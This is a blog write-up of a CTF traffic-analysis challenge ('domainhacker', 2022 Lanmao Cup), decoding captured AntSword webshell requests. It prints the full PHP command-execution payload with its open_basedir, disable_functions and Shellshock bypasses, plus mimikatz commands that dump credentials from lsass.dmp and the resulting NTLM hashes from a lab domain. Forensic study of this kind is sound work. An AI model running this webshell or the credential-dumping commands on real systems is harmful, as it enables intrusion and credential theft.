2022蓝帽杯初赛——domainhacker(蚁剑流量分析)

已于 2023-08-13 16:36:51 修改
阅读量571 收藏 2
点赞数 2
文章标签: 网络安全 php 运维 linux
于 2023-07-24 13:22:18 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_72667582/article/details/131894192
版权

image-20230724131019257

流量到手先过滤http

而后追踪TCP流

image-20230724131104815

这种带有ini_set的一眼蚁剑流量

image-20230724131201646

image-20230724131223957

url解码,格式化之后重点分析执行了什么命令

<?php
@ini_set("display_errors", "0");
@set_time_limit(0);
$opdir = @ini_get("open_basedir");
if ($opdir) {
    $ocwd = dirname($_SERVER["SCRIPT_FILENAME"]);
    $oparr = preg_split("/;|:/", $opdir);
    @array_push($oparr, $ocwd, sys_get_temp_dir());
    foreach ($oparr as $item) {
        if (!@is_writable($item)) {
            continue;
        };
        $tmdir = $item . "/.c46a89a";
        @mkdir($tmdir);
        if (!@file_exists($tmdir)) {
            continue;
        }
        @chdir($tmdir);
        @ini_set("open_basedir", "..");
        $cntarr = @preg_split("/\\\\|\//", $tmdir);
        for ($i = 0; $i < sizeof($cntarr); $i++) {
            @chdir("..");
        };
        @ini_set("open_basedir", "/");
        @rmdir($tmdir);
        break;
    };
};;
function asenc($out)
{
    return $out;
}

;
function asoutput()
{
    $output = ob_get_contents();
    ob_end_clean();
    echo "79c2" . "0b92";
    echo @asenc($output);
    echo "b4e7e" . "465b62";
}

ob_start();
try {
    $p = base64_decode(substr($_POST["yee092cda97a62"], 2));
    $s = base64_decode(substr($_POST["q8fb9d4c082c11"], 2));
    $envstr = @base64_decode(substr($_POST["p48a6d55fac1b1"], 2));
    $d = dirname($_SERVER["SCRIPT_FILENAME"]);
    $c = substr($d, 0, 1) == "/" ? "-c \"{$s}\"" : "/c \"{$s}\"";
    if (substr($d, 0, 1) == "/") {
        @putenv("PATH=" . getenv("PATH") . ":/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin");
    } else {
        @putenv("PATH=" . getenv("PATH") . ";C:/Windows/system32;C:/Windows/SysWOW64;C:/Windows;C:/Windows/System32/WindowsPowerShell/v1.0/;");
    }
    if (!empty($envstr)) {
        $envarr = explode("|||asline|||", $envstr);
        foreach ($envarr as $v) {
            if (!empty($v)) {
                @putenv(str_replace("|||askey|||", "=", $v));
            }
        }
    }
    $r = "{$p} {$c}";
    function fe($f)
    {
        $d = explode(",", @ini_get("disable_functions"));
        if (empty($d)) {
            $d = array();
        } else {
            $d = array_map('trim', array_map('strtolower', $d));
        }
        return (function_exists($f) && is_callable($f) && !in_array($f, $d));
    }

    ;
    function runshellshock($d, $c)
    {
        if (substr($d, 0, 1) == "/" && fe('putenv') && (fe('error_log') || fe('mail'))) {
            if (strstr(readlink("/bin/sh"), "bash") != FALSE) {
                $tmp = tempnam(sys_get_temp_dir(), 'as');
                putenv("PHP_LOL=() { x; }; $c >$tmp 2>&1");
                if (fe('error_log')) {
                    error_log("a", 1);
                } else {
                    mail("a@127.0.0.1", "", "", "-bv");
                }
            } else {
                return False;
            }
            $output = @file_get_contents($tmp);
            @unlink($tmp);
            if ($output != "") {
                print($output);
                return True;
            }
        }
        return False;
    }

    ;
    function runcmd($c)
    {
        $ret = 0;
        $d = dirname($_SERVER["SCRIPT_FILENAME"]);
        if (fe('system')) {
            @system($c, $ret);
        } elseif (fe('passthru')) {
            @passthru($c, $ret);
        } elseif (fe('shell_exec')) {
            print(@shell_exec($c));
        } elseif (fe('exec')) {
            @exec($c, $o, $ret);
            print(join("
", $o));
        } elseif (fe('popen')) {
            $fp = @popen($c, 'r');
            while (!@feof($fp)) {
                print(@fgets($fp, 2048));
            }
            @pclose($fp);
        } elseif (fe('proc_open')) {
            $p = @proc_open($c, array(1 => array('pipe', 'w'), 2 => array('pipe', 'w')), $io);
            while (!@feof($io[1])) {
                print(@fgets($io[1], 2048));
            }
            while (!@feof($io[2])) {
                print(@fgets($io[2], 2048));
            }
            @fclose($io[1]);
            @fclose($io[2]);
            @proc_close($p);
        } elseif (fe('antsystem')) {
            @antsystem($c);
        } elseif (runshellshock($d, $c)) {
            return $ret;
        } elseif (substr($d, 0, 1) != "/" && @class_exists("COM")) {
            $w = new COM('WScript.shell');
            $e = $w->exec($c);
            $so = $e->StdOut();
            $ret .= $so->ReadAll();
            $se = $e->StdErr();
            $ret .= $se->ReadAll();
            print($ret);
        } else {
            $ret = 127;
        }
        return $ret;
    }

    ;
    $ret = @runcmd($r . " 2>&1");
    print ($ret != 0) ? "ret={$ret}" : "";;
} catch (Exception $e) {
    echo "ERROR://" . $e->getMessage();
};
asoutput();
die();
&
p48a6d55fac1b1 = 3G & q8fb9d4c082c11 = 8mY2QgL2QgIkM6L3BocHN0dWR5X3Byby9XV1ciJndob2FtaSAvcHJpdiZlY2hvIGVmYTkyM2JhNTA0JmNkJmVjaG8gMWE0YmU4ODE1ZWY4 & yee092cda97a62 = yqY21k

    $p = base64_decode(substr($_POST["yee092cda97a62"], 2));
    $s = base64_decode(substr($_POST["q8fb9d4c082c11"], 2));
    $envstr = @base64_decode(substr($_POST["p48a6d55fac1b1"], 2));

这段代码中可以看到先对字符串进行截取操作,再base64解码,前两位都是混淆用的

p48a6d55fac1b1 = 3G & q8fb9d4c082c11 = 8mY2QgL2QgIkM6L3BocHN0dWR5X3Byby9XV1ciJndob2FtaSAvcHJpdiZlY2hvIGVmYTkyM2JhNTA0JmNkJmVjaG8gMWE0YmU4ODE1ZWY4 & yee092cda97a62 = yqY21k

image-20230724131502828

image-20230724131516374

之后的流量都这么分析

cd /d "c:\\Windows\\Temp"&mimikatz.exe "privilege::debug" "sekurlsa::minidump lsass.dmp" "sekurlsa::logonpasswords" "exit" > 1.txt&echo efa923ba504&cd&echo 1a4be8815ef8
cd /d "c:\\Windows\\Temp"&dir&echo efa923ba504&cd&echo 1a4be8815ef8
cd /d "c:\\Windows\\Temp"&rar.exe a -PSecretsPassw0rds 1.rar 1.txt&echo efa923ba504&cd&echo 1a4be8815ef8

这里可以看到1.rar的密码是SecretsPassw0rds,里面有mimikatz抓出来的东西

image-20230724131910410

image-20230724131926429

  .#####.   mimikatz 2.2.0 (x64) #19041 Jul 29 2021 11:16:51
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(commandline) # privilege::debug
Privilege '20' OK

mimikatz(commandline) # sekurlsa::minidump lsass.dmp
Switch to MINIDUMP : 'lsass.dmp'

mimikatz(commandline) # sekurlsa::logonpasswords
Opening : 'lsass.dmp' file for minidump...

Authentication Id : 0 ; 996 (00000000:000003e4)
Session           : Service from 0
User Name         : PDC$
Domain            : TEST
Logon Server      : (null)
Logon Time        : 2022/4/15 22:22:24
SID               : S-1-5-20
	msv :	
	 [00000003] Primary
	 * Username : PDC$
	 * Domain   : TEST
	 * NTLM     : 416f89c3a5deb1d398a1a1fce93862a7
	 * SHA1     : 54896b6f5e60e9be2b46332b13d0e0f110d6518f
	tspkg :	
	wdigest :	
	 * Username : PDC$
	 * Domain   : TEST
	 * Password : (null)
	kerberos :	
	 * Username : pdc$
	 * Domain   : test.local
	 * Password : 15 e0 7e 07 d9 9d 3d 42 45 40 38 ec 97 d6 25 59 c9 e8 05 d9 fa bd 81 f9 2e 05 67 84 e1 a3 a3 ec eb 65 ba 6e b9 60 9b dd 5a 74 4b 2e 07 68 94 fd a1 cb 2e 7b a2 13 07 31 34 c2 1d e8 95 53 43 38 61 91 53 2b c4 b0 3e ea 7a ac 03 60 1f bf e8 dc 00 c5 fe 13 ed 7a ca 88 32 fc d0 c6 ea d2 c7 b4 87 31 82 dd 4c 96 4f 23 80 39 2e 31 b0 cf 67 8e 63 b2 5e f9 77 32 44 05 8e 22 f9 0c 69 32 64 1b b8 2d a0 99 0e b8 0e 2c 10 b6 ff 6d 5f 11 c9 5e 46 eb 62 df 00 7a bd c6 7b 83 db 0f 58 ed ac a3 66 dd c2 ec df 9f 22 b3 34 0d 07 89 ea 3b 2b b1 e1 f9 e2 e5 85 cd a3 78 ae dd e3 98 78 39 8e 4f 49 5a b6 05 4c 6d 1a e6 fa 30 c7 c6 fb 4d dc b4 ca f6 3c 20 fe 70 eb e3 16 82 78 f8 49 8d 15 6a 15 10 ac d8 68 f8 ef ad 0c c2 39 f2 ca 80 ef 96 
	ssp :	KO
	credman :	

Authentication Id : 0 ; 997 (00000000:000003e5)
Session           : Service from 0
User Name         : LOCAL SERVICE
Domain            : NT AUTHORITY
Logon Server      : (null)
Logon Time        : 2022/4/15 22:22:24
SID               : S-1-5-19
	msv :	
	tspkg :	
	wdigest :	
	 * Username : (null)
	 * Domain   : (null)
	 * Password : (null)
	kerberos :	
	 * Username : (null)
	 * Domain   : (null)
	 * Password : (null)
	ssp :	KO
	credman :	

Authentication Id : 0 ; 70157 (00000000:0001120d)
Session           : Interactive from 1
User Name         : DWM-1
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 2022/4/15 22:22:24
SID               : S-1-5-90-1
	msv :	
	 [00000003] Primary
	 * Username : PDC$
	 * Domain   : TEST
	 * NTLM     : 416f89c3a5deb1d398a1a1fce93862a7
	 * SHA1     : 54896b6f5e60e9be2b46332b13d0e0f110d6518f
	tspkg :	
	wdigest :	
	 * Username : PDC$
	 * Domain   : TEST
	 * Password : (null)
	kerberos :	
	 * Username : PDC$
	 * Domain   : test.local
	 * Password : 15 e0 7e 07 d9 9d 3d 42 45 40 38 ec 97 d6 25 59 c9 e8 05 d9 fa bd 81 f9 2e 05 67 84 e1 a3 a3 ec eb 65 ba 6e b9 60 9b dd 5a 74 4b 2e 07 68 94 fd a1 cb 2e 7b a2 13 07 31 34 c2 1d e8 95 53 43 38 61 91 53 2b c4 b0 3e ea 7a ac 03 60 1f bf e8 dc 00 c5 fe 13 ed 7a ca 88 32 fc d0 c6 ea d2 c7 b4 87 31 82 dd 4c 96 4f 23 80 39 2e 31 b0 cf 67 8e 63 b2 5e f9 77 32 44 05 8e 22 f9 0c 69 32 64 1b b8 2d a0 99 0e b8 0e 2c 10 b6 ff 6d 5f 11 c9 5e 46 eb 62 df 00 7a bd c6 7b 83 db 0f 58 ed ac a3 66 dd c2 ec df 9f 22 b3 34 0d 07 89 ea 3b 2b b1 e1 f9 e2 e5 85 cd a3 78 ae dd e3 98 78 39 8e 4f 49 5a b6 05 4c 6d 1a e6 fa 30 c7 c6 fb 4d dc b4 ca f6 3c 20 fe 70 eb e3 16 82 78 f8 49 8d 15 6a 15 10 ac d8 68 f8 ef ad 0c c2 39 f2 ca 80 ef 96 
	ssp :	KO
	credman :	

Authentication Id : 0 ; 267962 (00000000:000416ba)
Session           : Interactive from 1
User Name         : administrator
Domain            : TEST
Logon Server      : PDC
Logon Time        : 2022/4/15 22:28:02
SID               : S-1-5-21-3633886114-1307863022-927341053-500
	msv :	
	 [00000003] Primary
	 * Username : Administrator
	 * Domain   : TEST
	 * NTLM     : a85016dddda9fe5a980272af8f54f20e
	 * SHA1     : 6f5f2ed7cc12564ac756917b3ee54d5396bed5ad
	 [00010000] CredentialKeys
	 * NTLM     : a85016dddda9fe5a980272af8f54f20e
	 * SHA1     : 6f5f2ed7cc12564ac756917b3ee54d5396bed5ad
	tspkg :	
	wdigest :	
	 * Username : Administrator
	 * Domain   : TEST
	 * Password : (null)
	kerberos :	
	 * Username : administrator
	 * Domain   : TEST.LOCAL
	 * Password : (null)
	ssp :	KO
	credman :	

Authentication Id : 0 ; 70375 (00000000:000112e7)
Session           : Interactive from 1
User Name         : DWM-1
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 2022/4/15 22:22:24
SID               : S-1-5-90-1
	msv :	
	 [00000003] Primary
	 * Username : PDC$
	 * Domain   : TEST
	 * NTLM     : 416f89c3a5deb1d398a1a1fce93862a7
	 * SHA1     : 54896b6f5e60e9be2b46332b13d0e0f110d6518f
	tspkg :	
	wdigest :	
	 * Username : PDC$
	 * Domain   : TEST
	 * Password : (null)
	kerberos :	
	 * Username : PDC$
	 * Domain   : test.local
	 * Password : 15 e0 7e 07 d9 9d 3d 42 45 40 38 ec 97 d6 25 59 c9 e8 05 d9 fa bd 81 f9 2e 05 67 84 e1 a3 a3 ec eb 65 ba 6e b9 60 9b dd 5a 74 4b 2e 07 68 94 fd a1 cb 2e 7b a2 13 07 31 34 c2 1d e8 95 53 43 38 61 91 53 2b c4 b0 3e ea 7a ac 03 60 1f bf e8 dc 00 c5 fe 13 ed 7a ca 88 32 fc d0 c6 ea d2 c7 b4 87 31 82 dd 4c 96 4f 23 80 39 2e 31 b0 cf 67 8e 63 b2 5e f9 77 32 44 05 8e 22 f9 0c 69 32 64 1b b8 2d a0 99 0e b8 0e 2c 10 b6 ff 6d 5f 11 c9 5e 46 eb 62 df 00 7a bd c6 7b 83 db 0f 58 ed ac a3 66 dd c2 ec df 9f 22 b3 34 0d 07 89 ea 3b 2b b1 e1 f9 e2 e5 85 cd a3 78 ae dd e3 98 78 39 8e 4f 49 5a b6 05 4c 6d 1a e6 fa 30 c7 c6 fb 4d dc b4 ca f6 3c 20 fe 70 eb e3 16 82 78 f8 49 8d 15 6a 15 10 ac d8 68 f8 ef ad 0c c2 39 f2 ca 80 ef 96 
	ssp :	KO
	credman :	

Authentication Id : 0 ; 46127 (00000000:0000b42f)
Session           : UndefinedLogonType from 0
User Name         : (null)
Domain            : (null)
Logon Server      : (null)
Logon Time        : 2022/4/15 22:22:21
SID               : 
	msv :	
	 [00000003] Primary
	 * Username : PDC$
	 * Domain   : TEST
	 * NTLM     : 416f89c3a5deb1d398a1a1fce93862a7
	 * SHA1     : 54896b6f5e60e9be2b46332b13d0e0f110d6518f
	tspkg :	
	wdigest :	
	kerberos :	
	ssp :	KO
	credman :	

Authentication Id : 0 ; 999 (00000000:000003e7)
Session           : UndefinedLogonType from 0
User Name         : PDC$
Domain            : TEST
Logon Server      : (null)
Logon Time        : 2022/4/15 22:22:21
SID               : S-1-5-18
	msv :	
	tspkg :	
	wdigest :	
	 * Username : PDC$
	 * Domain   : TEST
	 * Password : (null)
	kerberos :	
	 * Username : pdc$
	 * Domain   : TEST.LOCAL
	 * Password : (null)
	ssp :	KO
	credman :	

mimikatz(commandline) # exit
Bye!

416f89c3a5deb1d398a1a1fce93862a7即为flag

b3nguang
关注
  • 2
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
【MISC】domainhacker(第六届”蓝帽杯“全国大学生网络安全技能大赛)
07-11
【MISC】domainhacker(第六届”蓝帽杯“全国大学生网络安全技能大赛)
【MISC】domainhacker2(第六届”蓝帽杯“全国大学生网络安全技能大赛)
07-11
【MISC】domainhacker2(第六届”蓝帽杯“全国大学生网络安全技能大赛)
domainhackerbot:Mastodon bot吹嘘也是未注册域名的词典单词
02-03
domainhackerbot:Mastodon bot吹嘘也是未注册域名的词典单词
[蓝帽杯 2022 初赛]domainhacker
2202_75317918的博客
08-24 742
[蓝帽杯 2022 初赛]domainhacker
2022 第六届蓝帽杯初赛 WP By 知行网安
xczzhf的博客
07-11 1354
第六届蓝帽杯wp
[玄机]流量特征分析-流量分析
haosha。的博客
01-31 4041
流量特征分析-流量分析题目做法及思路解析(个人分享)
蓝帽杯 2022 部分wp
blowed的博客
07-14 471
蓝帽杯
蓝帽杯 2022 初赛Misc计算机取证所用工具和题目文件
最新发布
06-23
包含Arsenal-Image-Mounter、DiskGenius 64bit、Passware Kit工具,和题目用的内存镜像
【电子取证】网站取证(第六届”蓝帽杯“全国大学生网络安全技能大赛)
07-12
在第六届“蓝帽杯”全国大学生网络安全技能大赛中,参赛者可能需要掌握这项技术来解决实际问题。电子取证,也被称为数字取证,是指在法律允许的范围内,对电子设备中的数据进行收集、分析、验证,以获取与法律纠纷或...
【电子取证】程序分析(第六届”蓝帽杯“全国大学生网络安全技能大赛)
07-12
第六届”蓝帽杯“全国大学生网络安全技能大赛
[蓝帽杯 2022 初赛]之Misc篇(NSSCTF)刷题记录(复现)
Aluxian_的博客
05-08 2422
[蓝帽杯 2022 初赛]全国大学生网络安全竞赛 电子取证复现
[ CTF ]天机战队WriteUp-第六届”蓝帽杯“全国大学生网络安全技能大赛(初赛
ZXW_NUDT的博客
07-11 3529
第六届”蓝帽杯“全国大学生网络安全技能大赛
[CTF]-蓝帽杯2022复现
Mr.木Mu
07-10 571
打开.exe文件搜索文件 导出文件,查看属性 手机取证-2 搜索姜总聊天记录中找到 网站取证1 打开是个的框架,要求是找使用扫描后门找到第一个代码段 网站取证2 加密文件 是加密算法 网站取证3 网站取证4 将2022-04-02 00:00:00-2022-04-18 23:59:59的张宝和王子豪的记录取出来,还有汇率取出来放着汇率 计算机取证2 Misc domainhacker 搜流 ,有个流量包导出文件用打开,把冗余的部分删掉,保存为里面有个,需要解压密码密码在
近期misc刷题主要是流量分析部分
cppuHsir的博客
07-20 780
misc流量分析以及蓝帽杯misc部分题目
2022第六届蓝帽杯初赛writeup
qq_49422880的博客
07-10 1943
Writeup
初级黑客安全技术命令详解
diebai6789的博客
02-13 209
初级黑客安全技术命令详解要想做一名真正的黑客,仅仅依靠网络流传的黑软进行扫描或者攻击是没有用的,这样永远不可能成长为一名真正的黑客,大家需要注意的是,平时还得注意积累,这次笔者就简单的 为大家介绍一些系统命令,对于初学的菜鸟绝对是必修课之一。   对了,再说两句废话吧,“工欲善其事,必先利其器”——当然不是让你再满世界去找新的黑客软件啦(其实我不反对使用这些软件,相反我很喜欢用它们,但是...
2022蓝帽杯初赛wp
mumuzi的博客
07-10 5110
2022蓝帽初赛
[ctf misc][2021蓝帽杯决赛]ssh_traffic writeup
ShenZ的博客
09-02 1347
[2021蓝帽杯决赛]ssh_traffic 抓取了一段流量, 想知道他们用ssh传输了些什么呢? 附件:ssh_traffic_5e202f7c667dfd9b0398d65bfed46b2c.zip 解压得到traffic.pcapng,总共三个tcp流 过滤:tcp.stream eq 2,得到key,另存为key.json 利用工具network-parser解密ssh流量 network-parser -p traffic.pcapng --popt keyfile=key.json --p
2023蓝帽杯初赛misc下载
12-04
2023蓝帽杯初赛misc下载是指在2023年举办的蓝帽杯网络安全竞赛中的一项miscellaneous(杂项)类题目的下载。在初赛中,参赛选手需要下载与miscellaneous相关的题目文件或资源,并进行分析和解决。 首先,参赛选手需要前往蓝帽杯竞赛官方网站或相关论坛查找与初赛misc下载相关的公告或指引。这些网站通常会提供下载链接或资源分享的方式,以方便选手获取题目所需的文件或资源。 其次,根据所提供的下载链接,选手可以点击链接进行下载,也可以使用迅雷、qq旋风等下载工具进行高速下载,以确保下载的文件完整和无误。 在完成下载后,选手需要对下载的文件进行验证。可使用md5校验工具对下载后的文件进行校验,以确保文件的完整性和正确性,防止下载过程中出现错误导致文件损坏。 之后,选手可以开始进行miscellaneous题目的解析和答题。首先,解压下载的文件,查看所提供的题目资源、源代码或二进制文件等。根据题目要求和提示,选手可以使用各种工具和技术,如逆向工程、数据分析、密码学等,进行问题的分析和解决,并找出相应的答案或flag。 最后,选手需要将自己的解题过程、思路和答案记录下来,并按照比赛规则的要求提交答案。可以是一个文本文件或截图,或是将解决问题的代码或脚本提交到竞赛平台或指定的邮箱中。 总之,2023蓝帽杯初赛misc下载是参赛选手在参加蓝帽杯网络安全竞赛中所需进行的一项任务。选手需要在蓝帽杯官方网站或相关论坛上获取下载链接并下载题目相关的文件或资源,然后对其进行验证、解析和解决,最后提交答案以完成竞赛的要求。这项任务对选手的网络安全技术、解题思维和团队合作能力都提出了较高的要求。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值